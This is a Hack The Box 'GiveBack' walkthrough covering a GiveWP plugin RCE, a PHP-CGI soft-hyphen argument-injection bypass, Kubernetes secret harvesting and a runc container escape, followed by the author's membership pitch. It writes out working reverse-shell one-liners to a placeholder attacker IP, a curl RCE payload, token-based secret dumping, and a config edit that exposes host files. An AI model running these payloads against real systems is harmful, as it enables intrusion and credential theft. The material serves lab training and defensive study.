HTB Giveback Writeup & Walkthrough

Look, if you've spent any time grinding through complex lab environments or knocking out rooms, you already know that some machines are just built different and are specifically designed to break your standard, muscle-memory operational habits, and HTB GiveBack is absolutely one of those incredibly layered boxes.

I want to be super clear right out of the gate: we aren't doing a standard, paint-by-numbers exploit walkthrough here where you just blindly copy and paste terminal commands until a root flag magically drops onto your screen. Instead, we're taking a step back and looking at this purely through a learning-first, methodology breakdown lens, because the real, lasting value of a machine like this isn't in memorizing what to type, but in genuinely understanding how to think.

By stripping away the literal command syntax and focusing heavily on the overarching enumeration strategy, those critical decision-making patterns, and the deep architectural reasoning behind the vulnerabilities, the goal is to help you build a robust mental model that you can actually transfer to real-world assessments, advanced certifications, and the messy production environments you might be testing.

If you're genuinely invested in your long-term growth as a security practitioner and you want to understand why these attack paths exist rather than just how to trigger them, this analytical approach is going to compound massively for you over time, but if you're just looking for a quick write-up to get the points and move on, this probably isn't the breakdown for you.

Let's start with the skills tested in this box.

When you first spin up GiveBack, the initial access phase actually feels pretty familiar, mostly just testing your diligence in modern CMS exploitation by asking you to hunt down and leverage some known vulnerabilities within the GiveWP WordPress plugin just to get your foot in the door.

However, you are going to quickly realize that this initial breach is really just a decoy stepping stone, and the true gauntlet actually kicks off post-foothold, where the environment aggressively tests your situational awareness inside a highly restricted, containerized space.

You are completely forced to rely on a deep understanding of lateral movement, navigating through confusing internal routing complexities, and deploying your proxy tools creatively just to interact with heavily isolated network segments that are completely invisible from the outside world.

On top of all that, the machine throws a curveball by testing your knowledge of some seriously obscure PHP CGI misconfigurations, specifically that incredibly nuanced soft-hyphen bypass, forcing you to figure out how to execute arbitrary commands through interfaces that look perfectly secure at first glance.

Finally, the privilege escalation phase is just an absolute masterclass in modern container escape mechanics, directly challenging your familiarity with the notorious runc CVE-2024-21626 vulnerability and testing whether you can critically analyze and cleanly bypass poorly written bash-based deny lists using basic directory traversal instead of just throwing automated exploits at the wall to see what sticks.

Enumeration

Your initial recon with Nmap is going to spit out the standard web ports you'd expect to see, but the real aha moment comes when you notice the differing Time-To-Live (TTL) values between the SSH and HTTP services, which is a massive, albeit subtle, clue that practically screams you are dealing with a virtualized or containerized backend infrastructure.

Once you identify the target WordPress application, you have to realize that relying solely on passive observation is completely insufficient; you must aggressively enumerate the site, utilizing an API token to ensure you are getting highly accurate vulnerability mapping of installed plugins like GiveWP rather than just guessing based on generic version numbers.

To get a shell, you will need to exploit the CVE-2024-5932 vulnerability:

uv run CVE-2024-5932-rce.py --url http://giveback.htb/donations/the-things-we-need/ --cmd 'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"'

With your listener running, you will have your first shell.

After you achieve a reverse shell via CVE-2024-5932, you will discover a legacy application running on a separate internal pod (10.43.2.241). This service is vulnerable to a Best-Fit character encoding bypass.

Vulnerability: Bypassing previous fixes for CVE-2012-1823 by using the %AD (soft hyphen) character, which Windows-style CGI handling interprets as a dash (-).

Legacy Hint: Look for indicators like Windows-style CGI handling retained for legacy scripts.

RCE Payload Snippet:

PHP
// Bypasses the dash filter to inject PHP-CGI arguments
$url = "http://<Internal_IP>:5000/cgi-bin/php-cgi?%ADd+auto_prepend_file%3Dphp%3A%2F%2Finput";
// The POST body contains the PHP code to execute
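To see why a plain dash filter is not enough here, the following Python, added for this writeup and not part of the original post or of PHP's own source, models a simplified CVE-2012-1823-style check beside one that first folds the soft hyphen the way the Windows Best-Fit conversion will; the filter functions and the one-entry Best-Fit table are assumptions for illustration.

```python
from urllib.parse import unquote_to_bytes

# Constructed query strings: the page's soft-hyphen payload, its plain-dash
# twin, and a harmless one.
PAYLOADS = {
    "plain_dash": "-d+auto_prepend_file%3Dphp%3A%2F%2Finput",
    "soft_hyphen": "%ADd+auto_prepend_file%3Dphp%3A%2F%2Finput",
    "benign": "page%3D1",
}

# Hypothetical one-entry Best-Fit table: on Windows, code page conversion maps
# U+00AD (soft hyphen) onto ASCII '-' after the application's own checks ran.
BEST_FIT_TO_DASH = {0xAD}


def naive_filter_allows(query: str) -> bool:
    """Simplified CVE-2012-1823-style guard: refuse a query that starts with '-'.

    It inspects the bytes it receives, so 0xAD is not a dash yet and passes.
    """
    decoded = unquote_to_bytes(query)
    return not decoded.startswith(b"-")


def normalize_best_fit(decoded: bytes) -> bytes:
    """Fold Best-Fit code points to the ASCII byte the CGI layer will see."""
    return bytes(0x2D if b in BEST_FIT_TO_DASH else b for b in decoded)


def hardened_filter_allows(query: str) -> bool:
    """Fold first, then refuse any argument-like token that starts with '-'.

    A CGI query with no literal '=' is split on '+' into argv entries, so
    every token is checked, not just the first byte.
    """
    decoded = normalize_best_fit(unquote_to_bytes(query))
    tokens = decoded.replace(b"+", b" ").split()
    return not any(tok.startswith(b"-") for tok in tokens)


def compare(query: str) -> dict:
    """Side-by-side verdict for one query string."""
    return {"naive": naive_filter_allows(query),
            "hardened": hardened_filter_allows(query)}
```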

Note: If bash is missing in the container, use a standard POSIX pipe reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Attacker_IP> <Port> >/tmp/f

Kubernetes Cluster Pivot

After gaining a shell in the legacy pod, the focus shifts to internal cluster enumeration and secret harvesting.

Environment Discovery:

  • env: Check for KUBERNETES_SERVICE_HOST variables.
  • ls /var/run/secrets/kubernetes.io/serviceaccount/: Check for the JWT token and CA cert.

Interacting with the API (using curl):

Bash
# Get all secrets in the current namespace
# (run from the serviceaccount directory so that $(cat token) resolves)
curl -sk -H "Authorization: Bearer $(cat token)" \
  https://kubernetes.default.svc/api/v1/namespaces/default/secrets

Credential Recovery: Data in K8s secrets is Base64 encoded.

echo "<Encoded_String>" | base64 -d
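As an added example (not code from the original post), this Python decodes the two artefacts the steps above produce, entirely offline: the claims of the projected service-account JWT and the Base64 data fields of a secrets-list response. The token and the SecretList JSON are constructed samples, and the token carries a dummy signature.

```python
import base64
import json


def _b64url_decode(segment: str) -> bytes:
    # JWT segments drop '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sa_token_claims(token: str) -> dict:
    """Return the claims of a projected service-account JWT.

    The signature is deliberately not verified: this only reads which
    namespace and service account the token belongs to.
    """
    _header, payload, _signature = token.split(".")
    return json.loads(_b64url_decode(payload))


def decode_secret_list(api_response: str) -> dict:
    """Map secret name -> {key: decoded value} from a SecretList response.

    Every 'data' value comes back Base64-encoded (the page's base64 -d step).
    """
    items = json.loads(api_response).get("items", [])
    decoded = {}
    for item in items:
        name = item["metadata"]["name"]
        data = item.get("data") or {}
        decoded[name] = {k: base64.b64decode(v).decode("utf-8", "backslashreplace")
                         for k, v in data.items()}
    return decoded


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


# Constructed sample token: realistic claim layout, dummy signature.
_CLAIMS = {
    "iss": "https://kubernetes.default.svc",
    "sub": "system:serviceaccount:default:example-sa",
    "kubernetes.io": {"namespace": "default",
                      "serviceaccount": {"name": "example-sa"}},
}
SAMPLE_TOKEN = ".".join([_b64url(b'{"alg":"RS256","typ":"JWT"}'),
                         _b64url(json.dumps(_CLAIMS).encode()),
                         "dummysignature"])

# Constructed sample response for GET .../namespaces/default/secrets.
SAMPLE_SECRETS = json.dumps({
    "kind": "SecretList",
    "items": [{"metadata": {"name": "db-creds"}, "type": "Opaque",
               "data": {"username": base64.b64encode(b"app").decode(),
                        "password": base64.b64encode(b"example-pass").decode()}}],
})
```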

Privilege Escalation: Container Runtime Abuse (runc)

The final stage involves escaping a containerized environment or abusing host-level binary wrappers. The target provides a custom wrapper /opt/debug around runc.

Scenario A: Host FS Mount (Direct Abuse)

If runc allows custom OCI specs, you can mount the host's root directory into a new container.

  • runc spec: Generate a default config.json.
  • Modify config.json: Change the root path and add a mount for /.
  • sudo /opt/debug run <ID>: Execute the container to gain a root shell on the host filesystem.

Scenario B: CVE-2024-21626 (runc Escape)

A critical vulnerability involving a file descriptor leak during the runc run or runc exec process.

By setting the cwd (current working directory) to /proc/self/fd/7, an attacker can access the host's filesystem through the leaked file descriptor.

Exploit Snippet:

Bash
# Modifying the OCI spec to point to the leaked FD
# (replaces the whole cwd value, whatever it currently is, so the JSON stays valid)
sed -i 's#"cwd": "[^"]*"#"cwd": "/proc/self/fd/7"#' config.json
# Running the container then allows access to host files (e.g., /etc/shadow)
sudo /opt/debug run <ID>

Commands Cheat Sheet

Having a repository of precise syntax is crucial for maintaining momentum in environments as complex as this machine.

For the initial WordPress reconnaissance, executing

wpscan --url http://10.10.11.94 -e ap,u --api-token <YOUR_TOKEN>

is essential for uncovering the critical GiveWP vulnerability.

Once inside the initial container, setting up a stable reverse proxy requires transferring the Chisel binary and initiating the server on your attack machine with:

./chisel server --reverse --port 9000 --socks5

followed by executing the client connection from the compromised container:

./chisel client 10.10.14.X:9000 R:socks

To exploit the internal PHP-CGI interface, you must craft a highly specific POST request routed through your newly established proxy, injecting the soft-hyphen payload to force code execution:

curl -x socks5h://127.0.0.1:1080 -X POST -d "<?php system('id'); ?>" "http://10.43.2.241:5000/cgi-bin/php-cgi?%ADd+auto_prepend_file%3Dphp%3A%2F%2Finput"

When inspecting the Kubernetes environment, manual API interaction is often cleaner than deploying heavy binaries; extract the cluster secrets by executing:

curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" https://10.43.0.1/api/v1/namespaces/default/secrets

Escaping the Common Rabbit Holes

One of the most frustrating and common ways I see people fail on GiveBack is by getting brutal tunnel vision right after that initial exploit, where they will stubbornly waste hours upon hours banging their head against the wall trying to escalate privileges on that first WordPress container instead of realizing it's just a jumping-off point.

So many folks completely miss the glaring architectural red flags surrounding them, totally ignoring the lack of user mappings in the /etc/passwd file or the weird absence of a database service on localhost, missing the dead giveaways that they are sitting inside a Kubernetes pod.

Another huge roadblock pops up during the exploitation of that PHP CGI interface; people constantly misunderstand the highly specific encoding requirements of the soft-hyphen vulnerability, either forgetting to URL-encode their payload properly or totally botching the routing of their tools through their proxy setup, which just leads to a nightmare of timeout errors.

When it comes to the final privilege escalation phase, a remarkably common mistake is vastly overcomplicating the runc container escape by blindly firing off automated exploitation scripts instead of taking five minutes to just manually read the /opt/debug wrapper script.

Skipping that basic code review leads so many people to completely miss the intentionally flawed deny list, which can actually be effortlessly bypassed with some simple, old-school directory traversal, an approach that is way more elegant and reliable than trying to wrestle with complex file descriptor manipulation.
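To make the wrapper-review point concrete, here is an added Python model (not the machine's /opt/debug script, whose contents are not reproduced here) of a literal-string deny list beside a canonicalising allow-list check, extended to also flag the /proc/self/fd cwd pattern from Scenario B. The deny-list entries, the /tmp/bundles allow-listed directory and the config.json samples are assumptions for illustration.

```python
import json
import os

# Constructed deny list modelling the flaw class, not the machine's /opt/debug.
DENIED_ROOTFS = {"/", "/proc/self/fd/7", "/etc", "/root"}
# Hypothetical directory the wrapper is meant to confine bundles to.
ALLOWED_BUNDLE_DIR = "/tmp/bundles"


def naive_rootfs_allowed(rootfs: str) -> bool:
    """Literal comparison: '/tmp/bundles/../..' is not the string '/', so it passes."""
    return rootfs not in DENIED_ROOTFS


def canonical(path: str, bundle_dir: str = ALLOWED_BUNDLE_DIR) -> str:
    """Resolve root.path the way runc treats it: relative paths live under the bundle.

    normpath is pure string normalisation so this runs offline; on a live host
    also apply os.path.realpath so symlinks cannot point outside the bundle.
    """
    joined = path if os.path.isabs(path) else os.path.join(bundle_dir, path)
    return os.path.normpath(joined)


def hardened_rootfs_allowed(rootfs: str) -> bool:
    """Allow-list after canonicalisation: the rootfs must stay inside the bundle dir."""
    canon = canonical(rootfs)
    return canon == ALLOWED_BUNDLE_DIR or canon.startswith(ALLOWED_BUNDLE_DIR + "/")


def spec_is_safe(config_json: str) -> bool:
    """Check an OCI config.json before handing it to runc.

    Also refuses a process.cwd under /proc (the CVE-2024-21626 leaked-fd
    pattern); that is defence in depth only, the real fix is a patched runc.
    """
    spec = json.loads(config_json)
    cwd = spec.get("process", {}).get("cwd", "/")
    if cwd.startswith("/proc") or os.path.normpath(cwd).startswith("/proc"):
        return False
    return hardened_rootfs_allowed(spec.get("root", {}).get("path", "rootfs"))


# Constructed specs: a stock one and the two escape variants discussed above.
SPEC_DEFAULT = '{"root": {"path": "rootfs"}, "process": {"cwd": "/"}}'
SPEC_TRAVERSAL = '{"root": {"path": "/tmp/bundles/../.."}, "process": {"cwd": "/"}}'
SPEC_LEAKED_FD = '{"root": {"path": "rootfs"}, "process": {"cwd": "/proc/self/fd/7"}}'
```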

Tooling Up for the Job

When you are looking at your toolbelt for this one, WPScan is going to be your go-to authenticated enumeration framework, but you absolutely have to remember to feed it those API tokens if you want accurate patch levels for those obscure plugins, proving that unauthenticated guessing is a waste of time here.

Once you are actually inside the network, Chisel rapidly becomes the MVP of your toolkit, and you'll use it to effortlessly punch dynamic holes right through those strict Kubernetes networking restrictions to perfectly bridge your local attack box with those hidden internal subnets.

Burp Suite Professional really shines during the exploitation of that internal CMS, because its advanced proxy configurations let you seamlessly route your traffic straight through your Chisel tunnels, allowing you to manually craft, encode, and repeat those incredibly delicate PHP CGI payloads until you get them exactly right.

Finally, you really need to lean heavily on native command-line utilities rather than relying on pre-compiled exploit binaries; tools like jq are an absolute lifesaver for quickly parsing the massive, unreadable JSON walls of text returned by the Kubernetes API, and standard Linux file manipulation commands are completely critical for building the precise OCI container bundles you need to successfully trigger the runc escape.

The Real-World Takeaways and Cert Prep

If a box like GiveBack teaches us anything, it's the terrifying reality that a heavily armored external perimeter means absolutely nothing if your internal architecture is basically a house of cards built on unpatched software and way too much trust between isolated network segments.

The initial breach is a perfect reminder of why organizations desperately need rigorous, automated patch management for third-party CMS plugins, so benign-looking tools like GiveWP don't silently turn into massive remote code execution liabilities overnight.

Furthermore, that secondary compromise perfectly highlights the hidden, catastrophic dangers of keeping legacy tech like PHP CGI interfaces alive on the network, and it shows just how useless superficial deny lists are when you have an intelligent attacker who can just find a syntactical bypass, proving you need native orchestrator-level least privilege, not flimsy bash wrappers. 

Because it covers all of this so well, GiveBack is an absolutely top-tier training ground if you are currently prepping for the OSCP, as it heavily reinforces the core methodology of getting a foothold, pivoting intelligently, and leveraging internal services to push your attack forward. It's also an absolute gold mine of practice for anyone targeting cloud-heavy credentials like the CKS, given how deep you have to dive into Kubernetes enumeration and modern container escape mechanics.

The author

Motasem Hamdan

I'm a cybersecurity practitioner, technical writer, and content creator who got tired of resources that treat readers like beginners forever.

My notes are built the way I wish someone had built them when I was grinding through certs and CTFs — methodology-first, practitioner-grade, and structured for how analysts actually think on the job.

Over 62,000 people on YouTube follow along. Thousands more read on the site every month. These aren't notes for passing an exam and forgetting everything — they're references you'll keep coming back to.

motasem_notes — practitioner.sh
whoami
motasem_hamdan — cybersec_practitioner

cat expertise.txt
offensive_security: advanced
blue_team_soc:      advanced
threat_intel:       advanced
technical_writing:  practitioner-grade

ls content/
htb_writeups/  cert_cheatsheets/
ai_red_team/   soc_methodology/
threat_intel/  malware_analysis/

cat philosophy.txt
"teach how to think,
 not just what to type."

_

Membership

One subscription.
Everything unlocked.

Skip the hours lost searching fragmented resources. One membership gives you the full library, updated continuously as the threat landscape evolves.

Free $0 forever
  • Foundational notes library
  • Selected HTB summaries
  • YouTube companion write-ups
  • Tool overview guides
Start Reading
Store : One-Time Pay What You Want
  • Buy individual cheat sheets
  • Downloadable PDFs & guides
  • No recurring commitment
  • Yours to keep permanently
Browse Store

FAQ

Good questions.


The free tier has solid foundational content. Premium notes are written for intermediate-to-advanced practitioners — they assume you know the basics and want to go deeper. If you're grinding toward OSCP or working in a SOC, you'll feel right at home.
Continuously. New walkthroughs, methodology updates, and cheat sheets drop regularly — aligned with new HTB machines, cert updates, and emerging threat topics. As a member, you get access to everything as it lands.
Yes, absolutely. Membership is managed through Buy Me a Coffee — you can cancel any time directly from your account. No long-term lock-in, no awkward cancellation flows.
The membership gives you ongoing access to the full library for a monthly fee. The store lets you buy individual resources once and own them permanently — good if you just need one specific cert pack.
Definitely. Head to @MotasemHamdan on YouTube — over 62K subscribers and a large back-catalogue of walkthroughs, tool demos, and methodology breakdowns. Best way to see if the teaching style clicks for you before committing to anything.